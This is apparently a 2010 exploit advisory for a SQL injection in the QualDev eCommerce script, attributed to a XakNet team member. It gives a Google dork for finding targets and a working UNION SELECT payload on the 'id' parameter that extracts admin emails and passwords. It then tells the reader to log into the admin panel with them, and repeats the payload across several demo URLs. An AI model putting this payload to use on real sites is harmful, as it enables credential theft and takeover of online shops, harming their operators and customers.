====================================================
QualDev eCommerce script SQL injection vulnerability
====================================================# Exploit Title: QualDev eCommerce script SQL injection vulnerability# Vendor: http://www.qualdev.com# Date: 15.12.2010# Version: all version# Category:: webapps# Google dork: inurl:"index.php?file=allfile"# Tested on: FreeBSD 7.1# Author: ErrNick# Site: XakNet.ru, forum.xaknet.ru# Contact: errnick[at]xaknet[dot]ru# Greatz 2 all memberz of XakNet team ( X1mk0~, Saint, baltazar, SHYLLER,
Kronus, mst && others)# Intro:- A parameter isnot properly sanitised beforebeing used in a SQL query.- Inputpassed to "id"parameterisnotproperly
- sanitised before being used in a SQL query.Thiscan be
- exploitedtomanipulateSQL queries by injecting
- arbitrary SQL code.# Exploit:
index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
logining with admin email && password there
http://victim/adminpanel/#Demo:-
http://www.site.com/index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
Vizit us at http://xaknet.ru
